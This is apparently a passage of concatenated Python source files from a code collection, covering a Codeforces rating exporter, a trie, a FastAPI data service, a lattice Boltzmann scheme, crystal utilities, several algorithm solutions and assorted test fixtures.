                cv2.putText(masked, str(track.id), (rect_bottom_right[0], rect_top_left[1]),
                            font, font_scale, colour, thickness, cv2.LINE_AA)
    return good_tracks
| StarcoderdataPython |
186967 | <reponame>sarthakeddy/Codeforces-Profile-Viewer
import requests
import json
import xlsxwriter

# Prompt until a handle that exists on Codeforces is entered. A request for a
# non-existent profile is redirected to the Codeforces front page, which is how
# an invalid handle is detected here.
first_attempt = True
while True:
    if first_attempt:
        cf_id = input("Enter your codeforces id : ")
        first_attempt = False
    else:
        cf_id = input("Enter your codeforces id again\n")
    link = 'https://www.codeforces.com/profile/' + cf_id
    check = requests.get(link)
    display = "INVALID Codeforces ID"
    if check.url == "https://codeforces.com/":
        print(display.center(40, '*'))
    else:
        break

# Fetch the user's full contest rating history from the official API.
link = "https://codeforces.com/api/user.rating?handle=" + cf_id
js_object = requests.get(link)
py_dict = json.loads(js_object.text)

# Workbook named after the handle, with a header row describing each column.
wb = xlsxwriter.Workbook(cf_id + '.xlsx')
sheet = wb.add_worksheet()
contests = py_dict['result']
sheet.write('A1', "S No.")
sheet.write('B1', "Contest ID")
sheet.write('C1', "Contest Name")
sheet.write('D1', "Rank")
sheet.write('E1', "Old Rating")
sheet.write('F1', "New Rating")
sheet.write('G1', "Change in Rating")

# One row per rated contest; data rows start at row 3, matching the original
# layout. enumerate replaces the previous manually-incremented index.
for i, contest in enumerate(contests):
    row = str(i + 3)
    sheet.write('A' + row, i + 1)
    sheet.write('B' + row, contest['contestId'])
    sheet.write('C' + row, contest['contestName'])
    sheet.write('D' + row, contest['rank'])
    sheet.write('E' + row, contest['oldRating'])
    sheet.write('F' + row, contest['newRating'])
    sheet.write('G' + row, contest['newRating'] - contest['oldRating'])
wb.close()
4955635 | # AST tree
class Node:
    """A simple n-ary tree node holding a value and an ordered list of children."""

    def __init__(self, value):
        self.value = value      # payload stored at this node
        self.children = []      # child Node objects, in insertion order
# Build the example tree: root 'A' with leaf children 'B' and 'C'.
tree = Node('A')
for label in ('B', 'C'):
    tree.children.append(Node(label))
def print_node_value(value):
    """Node-visitor callback: print the node's value."""
    print(value)
def visit(node, handle_node):
    """Depth-first pre-order walk: call *handle_node* on each node's value."""
    handle_node(node.value)
    for subtree in node.children:
        visit(subtree, handle_node)
# Walk the example tree built above, printing every value in pre-order.
visit(tree, print_node_value)
9672375 | #!/usr/bin/python3
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import os,sys,re
from waflib import Options,TaskGen,Task,Utils
from waflib.TaskGen import feature,after_method
@feature('msgfmt')
def apply_msgfmt(self):
	# For each language declared on the task generator, compile <lang>.po into
	# <lang>.mo and install it as <appname>.mo under the KDE locale tree.
	for lang in self.to_list(self.langs):
		node=self.path.find_resource(lang+'.po')
		task=self.create_task('msgfmt',node,node.change_ext('.mo'))
		# Keep only the last path component as the language name
		# (e.g. 'po/fr' -> 'fr').
		langname=lang.split('/')
		langname=langname[-1]
		# Install path defaults to the KDE locale dir unless overridden.
		inst=getattr(self,'install_path','${KDE4_LOCALE_INSTALL_DIR}')
		self.bld.install_as(inst+os.sep+langname+os.sep+'LC_MESSAGES'+os.sep+getattr(self,'appname','set_your_appname')+'.mo',task.outputs[0],chmod=getattr(self,'chmod',Utils.O644))
class msgfmt(Task.Task):
	# waf task: compile a .po translation catalogue into a binary .mo file.
	color='BLUE'
	run_str='${MSGFMT} ${SRC} -o ${TGT}'
def configure(self):
	"""Detect KDE4: ask kde4-config for the install prefix, import the
	variables exported by KDELibsDependencies.cmake into the waf environment,
	register the common KDE library names and locate msgfmt."""
	kdeconfig=self.find_program('kde4-config')
	prefix=self.cmd_and_log('%s --prefix'%kdeconfig).strip()
	fname='%s/share/apps/cmake/modules/KDELibsDependencies.cmake'%prefix
	try:
		os.stat(fname)
	except OSError:
		# Some distributions ship the module under share/kde4 instead.
		fname='%s/share/kde4/apps/cmake/modules/KDELibsDependencies.cmake'%prefix
		try:
			os.stat(fname)
		except OSError:
			self.fatal('could not open %s'%fname)
	try:
		txt=Utils.readf(fname)
	except(OSError,IOError):
		self.fatal('could not read %s'%fname)
	# Join escaped line continuations and strip comments before scanning
	# for set(KEY "value") statements.
	txt=txt.replace('\\\n','\n')
	fu=re.compile('#(.*)\n')
	txt=fu.sub('',txt)
	# Raw string: the previous plain literal relied on '\s' and '\(' passing
	# through as invalid escapes, which raises SyntaxWarning (and eventually
	# SyntaxError) on modern Python. The pattern itself is unchanged.
	setregexp=re.compile(r'([sS][eE][tT]\s*\()\s*([^\s]+)\s+"([^"]+)"\)')
	found=setregexp.findall(txt)
	for(_,key,val)in found:
		self.env[key]=val
	self.env['LIB_KDECORE']=['kdecore']
	self.env['LIB_KDEUI']=['kdeui']
	self.env['LIB_KIO']=['kio']
	self.env['LIB_KHTML']=['khtml']
	self.env['LIB_KPARTS']=['kparts']
	self.env['LIBPATH_KDECORE']=[os.path.join(self.env.KDE4_LIB_INSTALL_DIR,'kde4','devel'),self.env.KDE4_LIB_INSTALL_DIR]
	self.env['INCLUDES_KDECORE']=[self.env['KDE4_INCLUDE_INSTALL_DIR']]
	self.env.append_value('INCLUDES_KDECORE',[self.env['KDE4_INCLUDE_INSTALL_DIR']+os.sep+'KDE'])
	self.find_program('msgfmt',var='MSGFMT')
| StarcoderdataPython |
11347539 | <reponame>jianershi/algorithm<gh_stars>1-10
"""
442. Implement Trie (Prefix Tree)
https://www.lintcode.com/problem/implement-trie-prefix-tree/description
answer modified based on 令狐冲's answer
https://www.jiuzhang.com/solution/implement-trie-prefix-tree/
"""
class TrieNode:
    """A single trie node: `children` maps a character to the next node."""

    def __init__(self):
        self.children = {}
        self.is_word = False  # True iff a complete inserted word ends here


class Trie:
    """Prefix tree supporting insert / exact search / prefix search.

    Lintcode 442 — Implement Trie (Prefix Tree).
    """

    def __init__(self):
        self.root = TrieNode()

    def insert(self, word):
        """Insert `word` into the trie.

        setdefault creates a new node only when the edge is missing; the
        previous `node.children.get(c, TrieNode())` allocated (and then
        discarded) a TrieNode on every traversal of an existing edge.
        """
        node = self.root
        for c in word:
            node = node.children.setdefault(c, TrieNode())
        node.is_word = True

    def search(self, word):
        """Return True iff `word` was inserted exactly."""
        node = self.find(word)
        return node is not None and node.is_word

    def find(self, word):
        """Walk the trie along `word`; return the final node, or None if the
        path does not exist."""
        node = self.root
        for c in word:
            if c not in node.children:
                return None
            node = node.children[c]
        return node

    def startsWith(self, prefix):
        """Return True iff some inserted word starts with `prefix`."""
        return self.find(prefix) is not None
| StarcoderdataPython |
3475729 | import json
import pathlib
import typing
from functools import lru_cache
from fastapi import FastAPI, Request
from fastapi.openapi.utils import get_openapi
from starlette.exceptions import HTTPException as StarletteHTTPException
from starlette.responses import PlainTextResponse, Response
from . import __version__ as VERSION
from .schema import json_schema
from .utils import INFO, get_title_and_description, projects_to_csv
# Charset used for every JSON response body.
CHARSET = "utf-8"
# Directory containing this module; data files are resolved relative to it.
app_dir = pathlib.Path(__file__).parent
class PrettyJSONResponse(Response):
    """ A pretty JSON response class """
    # Charset is advertised in the Content-Type so clients decode correctly.
    media_type = f"application/json; charset={CHARSET}"
    def render(self, content: typing.Any) -> bytes:
        # Two-space indent for human readability.
        return json.dumps(content, indent=2).encode(CHARSET)
def AppException(status_code=404):
    """Build the standard error response pointing clients at the docs URL."""
    payload = {
        "message": "Not Found",
        "documentation_url": "https://api.carbonplan.org/docs",
    }
    return PrettyJSONResponse(payload, status_code=status_code)
def get_data(kind):
    """ load the projects dataset """
    # Only the "projects" dataset exists today; anything else is a programming error.
    if kind != "projects":
        raise NotImplementedError(kind)
    with open(app_dir / "data" / "projects.json", "r") as f:
        return json.load(f)
# Create the FastAPI app; every endpoint defaults to pretty-printed JSON.
app = FastAPI(default_response_class=PrettyJSONResponse)
@app.exception_handler(StarletteHTTPException)
async def http_exception_handler(request, exc):
    """ Custom exception handler """
    # Map every HTTP error onto the standard docs-pointer payload,
    # preserving the original status code.
    return AppException(status_code=exc.status_code)
@app.middleware("http")
async def add_custom_header(request: Request, call_next):
    """ inject a few custom headers into app """
    response = await call_next(request)
    # Disable client caching and advertise the API media type and version.
    response.headers["Cache-Control"] = "no-cache"
    response.headers["x-carbonplan-media-type"] = f"carbonplan.{VERSION}; format=json"
    return response
@app.get("/")
@app.get(f"/{VERSION}/", include_in_schema=False)
@lru_cache(maxsize=32)
def root():
    """ base endpoint for API """
    # Static index payload; lru_cache makes repeat calls free.
    return {
        "docs_url": "https://api.carbonplan.org/docs",
        "schema_url": "https://api.carbonplan.org/schema.json",
        "projects_url": "https://api.carbonplan.org/projects.json",
    }
@app.get("/projects.json")
@app.get(f"/{VERSION}/projects.json", include_in_schema=False)
@lru_cache(maxsize=32)
def projects(id: str = None):
    """Return the `ProjectCollection` when `id` is None, otherwise the matching
    `Project` (an empty dict when no project has that id)."""
    data = get_data("projects")
    if id is None:
        # Fix: the id-matching loop below previously also ran when id was
        # None, scanning every project against None for nothing (and a
        # project with a null id would have shadowed the whole collection).
        return data
    for p in data["projects"]:
        if p["id"] == id:
            return p
    return {}
@app.get("/projects.csv")
@app.get(f"/{VERSION}/projects.csv", include_in_schema=False)
@lru_cache(maxsize=32)
def projects_csv(id: str = None):
    """Return the `ProjectCollection` as CSV when `id` is None, otherwise the
    single matching `Project` row."""
    data = get_data("projects")
    # projects_to_csv handles both the full collection and single-id filtering.
    csv = projects_to_csv(data["projects"], id)
    return PlainTextResponse(csv, media_type="text/csv")
@app.get("/schema.json")
@app.get(f"/{VERSION}/schema.json", include_in_schema=False)
@lru_cache(maxsize=32)
def schema(obj: str = None):
    """Return the list of object names defined in the JSON schema."""
    # NOTE(review): the `obj` query parameter is accepted but never used here;
    # per-object lookups live in /schema/{obj}.json. Confirm whether it can be dropped.
    return {"objects": list(json_schema.objects.keys())}
@app.get("/schema/{obj}.json")
@app.get(f"/{VERSION}/schema/{{obj}}.json", include_in_schema=False)
@lru_cache(maxsize=32)
def schema_object(obj: str):
    """Return the schema for `obj`"""
    try:
        return json_schema.get(obj)
    except KeyError:
        # Unknown object name -> standard 404 payload with docs pointer.
        return AppException()
def custom_openapi():
    """function to set custom OpenAPI schema"""
    # Build the schema once and memoise it on the app instance.
    if app.openapi_schema:
        return app.openapi_schema
    title, description = get_title_and_description()
    openapi_schema = get_openapi(
        title=title,
        version=VERSION,
        description=description,
        routes=app.routes,
    )
    # Merge in the static info block (contact/license/etc.) from utils.
    openapi_schema["info"].update(INFO)
    app.openapi_schema = openapi_schema
    return app.openapi_schema
# Override FastAPI's default OpenAPI generator with the cached custom one.
app.openapi = custom_openapi
| StarcoderdataPython |
1832056 | <gh_stars>1-10
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from builtins import zip
from builtins import range
from builtins import object
import numpy as np
from . import crystal
def bijk_to_coord(prim,bijk,sd=(True,True,True)):
    """Convert the bijk index into an atomic coordinate,
    given the primitive structure

    Parameters
    ----------
    prim : Crystal
        Primitive structure supplying the lattice and basis.
    bijk : (int,int,int,int)
        Basis index b followed by unit-cell offsets i, j, k.
    sd : (bool,bool,bool), optional
        Selective-dynamics flags forwarded to the coordinate.

    Returns
    -------
    SelectiveAtomCoord
    """
    # Cartesian position = lattice * (i, j, k) + cartesian position of basis site b.
    cart=np.dot(prim.lattice().column_lattice(),bijk[1::])+prim.cart()[bijk[0]]
    # NOTE(review): the position uses basis index bijk[0], but the name is
    # always taken from basis()[0]; for multi-species primitives this looks
    # like it should be prim.basis()[bijk[0]].name() — confirm.
    name=prim.basis()[0].name()
    return crystal.SelectiveAtomCoord(cart[0],cart[1],cart[2],name,sd)
def stamp_site(jumbo, site, tol):
    """
    Find the closest matching site in the superstructure; if the periodic
    distance to it is within the tolerance, replace it with the new site.

    Parameters
    ----------
    jumbo : Crystal
        Superstructure whose basis is modified in place.
    site : SelectiveAtomCoord
        Replacement site.
    tol : float
        Maximum allowed periodic distance between `site` and its best match.

    Returns
    -------
    Crystal
        The same `jumbo` object, mutated.
    """
    ix = crystal.argsort_periodic_coord_match(jumbo.basis(), [site], jumbo.lattice())[0]
    dot = crystal.shortest_periodic_coord_distance(site, jumbo.basis()[ix], jumbo.lattice())
    if dot > tol:
        # Fixed error message: was the ungrammatical
        # "You're coordinates don't match. What do."
        raise ValueError("No site in the superstructure matches the given coordinate within tolerance.")
    jumbo._basis[ix] = site
    return jumbo
def stamp_bijk(jumbo, prim, bijk, name, trans=(0, 0, 0), tol=0.00001):
    """
    Replace the superstructure site closest to the primitive-cell coordinate
    `bijk` (optionally translated by `trans`) with a site of the given name.

    Parameters
    ----------
    jumbo : Crystal
        Superstructure, mutated in place.
    prim : Crystal
        Primitive structure defining the bijk coordinate system.
    bijk : [int,int,int,int]
        Basis index, then unit-cell offsets i, j, k.
    name : str
        New species/site name to stamp.
    trans : (int,int,int), optional
        Extra unit-cell translation applied to (i, j, k).
    tol : float, optional
        Matching tolerance forwarded to stamp_site.

    Returns
    -------
    Crystal
    """
    # Work on a copy so the caller's bijk list is not mutated.
    shifted = [component for component in bijk]
    shifted[1] += trans[0]
    shifted[2] += trans[1]
    shifted[3] += trans[2]
    stamp = bijk_to_coord(prim, shifted)
    stamp._name = name
    # Bug fix: the `tol` parameter was previously ignored in favour of a
    # hard-coded 0.00001; forward it to stamp_site.
    stamp_site(jumbo, stamp, tol)
    return jumbo
| StarcoderdataPython |
107626 | <gh_stars>0
#!/usr/bin/env python
"""rundevel.py -- script to run current code
Usage: [interpreter] rundevel.py [run|rebot] [options] [arguments]
Examples:
./rundevel.py --name Example tests.txt # run with python
./rundevel.py run --name Example tests.txt # same as above
jython rundevel.py --name Example tests.txt # run with jython
./rundevel.py rebot --name Example out.xml # rebot with python
ipy rundevel.py rebot --name Example out.xml # rebot with ipy
"""
from os.path import abspath, dirname, exists, join
import os
import sys
if len(sys.argv) == 1:
sys.exit(__doc__)
curdir = dirname(abspath(__file__))
src = join(curdir, 'src')
tmp = join(curdir, 'tmp')
tmp2 = join(tmp, 'rundevel')
if not exists(tmp):
os.mkdir(tmp)
if not exists(tmp2):
os.mkdir(tmp2)
os.environ['ROBOT_SYSLOG_FILE'] = join(tmp, 'syslog.txt')
os.environ['ROBOT_INTERNAL_TRACES'] = 'yes'
os.environ['TEMPDIR'] = tmp2 # Used by tests under atest/testdata
if 'PYTHONPATH' not in os.environ: # Allow executed scripts to import robot
os.environ['PYTHONPATH'] = src
else:
os.environ['PYTHONPATH'] = os.pathsep.join([src, os.environ['PYTHONPATH']])
sys.path.insert(0, src)
from robot import run_cli, rebot_cli
if sys.argv[1] == 'rebot':
runner = rebot_cli
args = sys.argv[2:]
else:
runner = run_cli
args = ['--pythonpath', join(curdir, 'atest', 'testresources', 'testlibs'),
'--pythonpath', tmp,
'--loglevel', 'DEBUG']
args += sys.argv[2:] if sys.argv[1] == 'run' else sys.argv[1:]
runner(['--outputdir', tmp] + args)
| StarcoderdataPython |
4924113 | import json
from pathlib import Path
import pandas as pd
def spi_hierarchy():
    """Build the SPI indicator hierarchy from the 'Definitions' sheet of
    data/spi2019.xlsx.

    Returns
    -------
    dict
        {Dimension: {Component: [Indicator name, ...]}} — rows with any
        missing value in the sheet are skipped.

    Notes
    -----
    The previous inner helper `rec(defs, keys)` ignored its `keys` argument
    and computed an unused `indices` list; both have been removed.
    """
    defs = pd.read_excel(str(Path(__file__).parent.parent / 'data' / 'spi2019.xlsx'),
                         sheet_name='Definitions', skiprows=[0])
    dimensions = {}
    for _, row in defs.iterrows():
        if pd.notna(row).all():
            dimension = row['Dimension']
            component = row['Component']
            name = row['Indicator name']
            dimensions.setdefault(dimension, {}).setdefault(component, []).append(name)
    return dimensions
######################################################################
# Bokeh section
from bokeh.models import RadioButtonGroup
from bokeh.layouts import column
class IndexMenus():
    'Cascading menu widget that follows the SPI indicator hierarchy'
    tree = spi_hierarchy() # tree structure representing the SPI indicator hierarchy
    def __init__(self, doc):
        '''
        Attributes
        ----------
        view: Column
            the cascading menu widget
        path: list of str
            items selected so far, one per menu level
        '''
        def set_callback(choice, level):
            '''
            Configure the behaviour (on_change) for when an element of the
            level-th menu `choice` is selected (active).

            Parameters
            ----------
            choice :
                the menu widget
            level :
                level within the menu hierarchy (0-indexed)

            Notes
            -----
            Passing choice and level into set_callback creates a closure
            capturing both values.
            '''
            def on_change(attr, old, new):
                if new is None: return # This is the case when the active field of a widget is updated within the "update" method
                self.path = self.path[:level] + [choice.labels[new]]
                self._update()
            choice.on_change('active', on_change)
        def button_group(level):
            choice = RadioButtonGroup(labels=['None'], visible=False, active=None)
            set_callback(choice, level)
            return choice
        self.view = column(name='index_menus',
                           children=[button_group(level) for level in range(3)],
                           css_classes=['spix', 'spix-spi-view'],
                           sizing_mode='scale_width')
        self.path = []
        self._update()
        doc.add_root(self.view)
    def _update(self):
        print(' > '.join(self.path)) # show the current selection state
        menu = self.view.children
        for level, choice in enumerate(menu):
            choice.visible = level <= len(self.path)
        menu[len(self.path)].active = None
        # Update the cascading menu labels to follow the hierarchical selection
        t = self.tree
        menu[0].labels = sorted(t.keys())
        for active, choice in zip(self.path, menu[1:]):
            t = t[active] # walk the hierarchy tree along the selection (path)
            if type(t) == dict: # intermediate grouping level (dict of sub-groups)
                choice.labels = sorted(t.keys())
            else: # leaf level: enumerate and print the final indicator names
                choice.visible = False
                for index in t: print(f' - {index}')
| StarcoderdataPython |
3542748 | <gh_stars>1-10
def florida_getEnhancedLocation(location):
    # Annotate the given location with the state "Florida" via the shared
    # add_state helper (defined elsewhere in the package).
    return add_state(location, "Florida")
class Circulo:
    """Circle metrics computed from an explicitly supplied value of pi."""

    def calcular_area(self, pi, raio):
        """Area of a circle of radius `raio` (pi * r * r)."""
        area = pi * raio * raio
        return area

    def calcular_perimetro(self, pi, raio):
        """Circumference of a circle of radius `raio` (2 * pi * r)."""
        perimetro = 2 * pi * raio
        return perimetro
# Demo run: radius 10, with pi approximated as 3.14.
circulo = Circulo()
print(circulo.calcular_area(3.14, 10))
print(circulo.calcular_perimetro(3.14, 10))
136140 | <reponame>yanshengjia/algorithm<gh_stars>10-100
"""
Given an unsorted array of integers, find the length of the longest consecutive elements sequence.
Your algorithm should run in O(n) complexity.
Example:
Input: [100, 4, 200, 1, 3, 2]
Output: 4
Explanation: The longest consecutive elements sequence is [1, 2, 3, 4]. Therefore its length is 4.
Solution:
1. Sort
2. Hashset
"""
# Sort
# TLE: while loop too slow
# Time: O(NlogN)
# Space: O(1)
class Solution(object):
    def longestConsecutive(self, nums):
        """
        :type nums: List[int]
        :rtype: int

        Sort-based scan: for every start index, walk forward while values are
        consecutive (or duplicates). Known to be slow on large inputs because
        the inner walk restarts for every index (the original TLE version).
        """
        n = len(nums)
        if n == 0:
            return 0
        nums.sort()
        best = 0
        for start in range(n):
            run = 1
            scan = start + 1
            while scan < n:
                if nums[scan] == nums[scan - 1] + 1:
                    run += 1
                    scan += 1
                elif nums[scan] == nums[scan - 1]:
                    # duplicate: extend the walk without growing the run
                    scan += 1
                else:
                    break
            if run > best:
                best = run
            start = scan  # no effect: the for loop rebinds `start` each iteration
        return best
# Sort
# Time: O(NlogN)
# Space: O(1)
class Solution(object):
    def longestConsecutive(self, nums):
        """
        :type nums: List[int]
        :rtype: int

        Sort once, then a single linear pass: duplicates are skipped, a +1
        step extends the current run, anything else closes it.
        """
        count = len(nums)
        if count == 0:
            return 0
        nums.sort()
        longest, current = 0, 1
        for idx in range(1, count):
            if nums[idx] == nums[idx - 1]:
                continue  # skip duplicates without touching the run
            if nums[idx] == nums[idx - 1] + 1:
                current += 1
            else:
                longest = max(longest, current)
                current = 1
        # The run that reaches the end of the array may be the longest one.
        return max(longest, current)
# Sort
# Time: O(NlogN)
# Space: O(1)
class Solution(object):
    def longestConsecutive(self, nums):
        """
        :type nums: List[int]
        :rtype: int

        Deduplicate with set(), sort the unique values, then count runs of
        +1 steps in one pass over adjacent pairs.
        """
        if len(nums) < 2:
            return len(nums)
        unique = sorted(set(nums))
        best = run = 1
        for prev, cur in zip(unique, unique[1:]):
            if cur == prev + 1:
                run += 1
            else:
                best = max(best, run)
                run = 1
        return max(best, run)
# Set
# Time: O(N), since we visit each number once
# Space: O(1)
class Solution(object):
    def longestConsecutive(self, nums):
        """
        :type nums: List[int]
        :rtype: int

        O(N) set walk: only a number whose predecessor (num - 1) is absent
        can start a run, so each element is visited a bounded number of times.
        """
        values = set(nums)
        best = 0
        for start in values:
            if start - 1 in values:
                continue  # not the start of a run; it will be counted from its start
            length = 1
            cur = start
            while cur + 1 in values:
                length += 1
                cur += 1
            best = max(best, length)
        return best
5173800 | <gh_stars>0
import socket
# Simple TCP client: connects to a server on this same machine (port 12346)
# and prints everything it receives in 512-byte chunks.
s= socket.socket()
# connect to the host
print("Socket Name: " ,socket.gethostname())
s.connect((socket.gethostname(),12346))
# The first message from the server acts as a greeting/handshake.
print("Connection created : ",s.recv(512))
while True:
    data = s.recv(512)
    print('data long is ',len(data))
    print(data.decode(),end='\n')
    # NOTE(review): when the server closes the connection, the empty chunk is
    # still printed once above before this break triggers.
    if (len(data) < 1):
        break
s.close()
| StarcoderdataPython |
6691611 | <reponame>langgithub/LangSpider
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# author:yuanlang
# creat_time: 2020/7/16 上午10:34
# file: utils.py
import hashlib
import click
def get_redis_task_key_name(site_type, crawl_type):
    """Return the Redis key name for the task queue of this site/crawl type."""
    return f"{site_type}_{crawl_type}_tasks"
def get_headers_from_text(text):
    """Parse a copied raw header block ("Key: value" per line) into a dict.

    Lines without a colon are ignored, and whitespace around keys and values
    is stripped. This fixes two defects of the previous version: a line whose
    key had surrounding spaces got a wrongly-sliced value (the slice used the
    length of the *stripped* key), and colon-less lines were silently added
    with the whole line as key and an empty value.
    """
    headers = {}
    for line in text.split('\n'):
        line = line.strip()
        if not line:
            continue
        key, sep, value = line.partition(':')
        if sep:
            headers[key.strip()] = value.strip()
    return headers
def get_cookies_from_text(text):
    """Parse a raw Cookie header string ("name=value; name2=value2") into a dict.

    Only the first '=' splits each segment, so values may themselves contain
    '='. Empty segments (e.g. from a trailing ';') and segments without '='
    are skipped instead of raising ValueError as the previous version did.
    """
    cookies = {}
    for segment in text.split(';'):
        name, sep, value = segment.strip().partition('=')
        if sep:
            cookies[name] = value
    return cookies
def echo_help():
    """Print the current click command's help text and exit the CLI context."""
    ctx = click.get_current_context()
    click.echo(ctx.get_help())
    # ctx.exit() terminates the click invocation; code after it never runs.
    ctx.exit()
# MD5 hashing helper.
def md5(src):
    """Return the hex MD5 digest of *src*; str input is UTF-8-encoded first."""
    if isinstance(src, str):
        src = src.encode('utf-8')
    return hashlib.md5(src).hexdigest()
def run():
    """Placeholder entry point; not implemented yet."""
    pass
if __name__ == '__main__':
    run()
# source repo: Mopolino8/pylbm
# Authors:
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# License: BSD 3 clause
"""
Example of a two velocities scheme for the shallow water system
d_t(h) + d_x(q) = 0, t > 0, 0 < x < 1,
d_t(q) + d_x(q^2/h+gh^2/2) = 0, t > 0, 0 < x < 1,
"""
import sympy as sp
import pylbm
# pylint: disable=invalid-name
# Symbolic names: conserved moments h (height) and q (discharge), space X.
H, Q, X = sp.symbols('h, q, X')
# lambda is the lattice velocity, g the gravity constant.
LA, G = sp.symbols('lambda, g', constants=True)
SIGMA_H, SIGMA_Q = sp.symbols('sigma_1, sigma_2', constants=True)
# Two D1Q2 schemes, one per conserved moment of the shallow-water system.
scheme_cfg = {
    'dim': 1,
    'scheme_velocity': LA,
    'schemes': [
        {
            'velocities': [1, 2],
            'conserved_moments': H,
            'polynomials': [1, X],
            # Relaxation rate written via the Henon parameter sigma.
            'relaxation_parameters': [0, 1/(.5+SIGMA_H)],
            'equilibrium': [H, Q],
        },
        {
            'velocities': [1, 2],
            'conserved_moments': Q,
            'polynomials': [1, X],
            'relaxation_parameters': [0, 1/(.5+SIGMA_Q)],
            # Momentum flux equilibrium: q^2/h + g h^2 / 2.
            'equilibrium': [Q, Q**2/H+.5*G*H**2],
        },
    ],
    'parameters': {
        LA: 1.,
        G: 9.81,
        SIGMA_H: 1/1.8-.5,
        SIGMA_Q: 1/1.2-.5,
    },
}
scheme = pylbm.Scheme(scheme_cfg)
# Print the PDE system that this lattice Boltzmann scheme approximates.
eq_pde = pylbm.EquivalentEquation(scheme)
print(eq_pde)
t=int(input())
# For each of t test cases: read d (day, pocket-money) pairs, then answer q
# queries (deadline, required amount) with 'Go Camp' if enough money can be
# collected by the deadline, else 'Go Sleep'.  Assumes days arrive sorted.
while(t>0):
    l=[]
    # NOTE(review): l1 and j1 are never used — presumably leftovers.
    l1=[]
    j=[]
    j1=[]
    t=t-1
    d=int(input())
    while(d>0):
        d=d-1
        day,p=map(int,input().split())
        l.append(day)
        j.append(p)
    q=int(input())
    while(q>0):
        # Work on copies so a query cannot disturb the base data.
        l2=l.copy()
        j2=j.copy()
        q=q-1
        dead,req=map(int,input().split())
        i=-1
        if(dead<l2[0]):
            # Deadline before any money arrives.
            print('Go Sleep')
        elif(dead>=l2[-1] and sum(j2)>=req):
            print('Go Camp')
        elif(dead>=l2[-1] and sum(j2)<req):
            print('Go Sleep')
        else:
            # Find the last day index not after the deadline.
            while(dead>=l2[i+1] and i<len(j2)-2):
                i=i+1
            if(i==0 and req<=j2[0]):
                i=1
            dead=l2[i]
            # Sum of money available up to and including day index i.
            if(sum(j2[0:i+1])>=req):
                print('Go Camp')
            else:
                print('Go Sleep')
# file: server/tests/test_api.py
# @file
#
# FadZmaq Project
# Professional Computing. Semester 2 2019
#
# Copyright FadZmaq © 2019 All rights reserved.
# @author <NAME> <EMAIL>
# @author <NAME> <EMAIL>
import json
# Tests that the server is up at all.
def test_index(client):
    """Root URL should redirect permanently (308) without following it."""
    response = client.get('/', follow_redirects=False)
    assert response.status_code == 308
# Not implemented
def test_user_request(client):
    response = client.get('/user/recs', follow_redirects=True)
    assert response.status_code == 200
# Not implemented
def test_user_request_by_id(client):
    response = client.get('/user/1234', follow_redirects=True)
    assert response.status_code == 410
# Basic test of the profile API.
# To be expanded when we receive data from DB -Jordan
def test_profile(client):
    """Profile endpoint returns JSON with a 'profile' object containing 'name'."""
    # Check we get a response
    response = client.get('/profile', follow_redirects=True)
    assert response.status_code == 200
    data = json.loads(response.data)
    assert "profile" in data
    profile = data["profile"]
    assert "name" in profile
    # assert "age" in profile
def test_profile_post(client):
    """Deliberately failing placeholder until JSON posting is implemented."""
    # Note this currently fails since the posting to profile is *not* implemented with json.
    # Do not change this test, profile should (and will soon) be json.
    # post_data = dict(somedata=profile_data.my_profile)
    # response = client.post('/profile', data=post_data, follow_redirects=True)
    # assert response.status_code == 200
    assert True is False
def test_matches(client):
    response = client.get('/matches', follow_redirects=True)
    assert response.status_code == 200
    print(response)
def test_match_request_by_id(client):
    response = client.get('/matches/b026324c6904b2a9cb4b88d6d61c81d1', follow_redirects=True)
    assert response.status_code == 200
# Not implemented yet
def test_match_delete_by_id(client):
    response = client.delete('/matches/b026324c6904b2a9cb4b88d6d61c81d1', follow_redirects=True)
    assert response.status_code == 204
def test_match_thumb_down(client):
    response = client.post('/matches/thumbs/down/b026324c6904b2a9cb4b88d6d61c81d1', follow_redirects=True)
    assert response.status_code == 204
def test_match_thumb_up(client):
    response = client.post('/matches/thumbs/up/b026324c6904b2a9cb4b88d6d61c81d1', follow_redirects=True)
    assert response.status_code == 204
def test_like(client):
    response = client.post('/like/b026324c6904b2a9cb4b88d6d61c81d1', follow_redirects=True)
    assert response.status_code == 200
def test_pass(client):
    # NOTE(review): "<PASSWORD>" looks like dataset-anonymization residue in
    # the URL — confirm the intended path segment before relying on this test.
    response = client.post('/pass/<PASSWORD>', follow_redirects=True)
    assert response.status_code == 200
from __future__ import unicode_literals
import pytest
from aocd.models import User
@pytest.fixture(autouse=True)
def mocked_sleep(mocker):
    """Patch time.sleep globally so tests never actually wait."""
    no_sleep_till_brooklyn = mocker.patch("time.sleep")
    return no_sleep_till_brooklyn
@pytest.fixture
def aocd_dir(tmp_path):
    """Create and return a throwaway ~/.config/aocd directory."""
    data_dir = tmp_path / ".config" / "aocd"
    data_dir.mkdir(parents=True)
    return data_dir
@pytest.fixture(autouse=True)
def remove_user_env(aocd_dir, monkeypatch):
    """Point all aocd modules at the temp dir and clear AOC_SESSION."""
    monkeypatch.setattr("aocd.runner.AOCD_DIR", str(aocd_dir))
    monkeypatch.setattr("aocd.models.AOCD_DIR", str(aocd_dir))
    monkeypatch.setattr("aocd.cookies.AOCD_DIR", str(aocd_dir))
    monkeypatch.delenv(str("AOC_SESSION"), raising=False)
@pytest.fixture(autouse=True)
def test_token(aocd_dir):
    """Write a fake session token and matching per-user cache directory."""
    token_file = aocd_dir / "token"
    cache_dir = aocd_dir / "testauth.testuser.000"
    cache_dir.mkdir()
    token_file.write_text("thetesttoken")
    return token_file
@pytest.fixture(autouse=True)
def answer_not_cached(request, mocker):
    """By default pretend no previous guess exists; the `answer_not_cached`
    marker can disable the patch or set a canned return value."""
    install = True
    rv = None
    mark = request.node.get_closest_marker("answer_not_cached")
    if mark:
        install = mark.kwargs.get("install", True)
        rv = mark.kwargs.get("rv", None)
    if install:
        mocker.patch("aocd.models.Puzzle._check_guess_against_existing", return_value=rv)
@pytest.fixture(autouse=True)
def detect_user_id(requests_mock):
    """Stub the settings page used for user-id detection, and reset the
    token->id cache after each test."""
    requests_mock.get(
        "https://adventofcode.com/settings",
        text="<span>Link to testauth/testuser</span><code>000</code>",
    )
    yield
    if getattr(User, "_token2id", None) is not None:
        User._token2id = None
# VQC implemented in pennylane.
import os
import json
import pennylane as pnl
from pennylane import numpy as np
import autograd.numpy as anp
from pennylane.optimize import AdamOptimizer
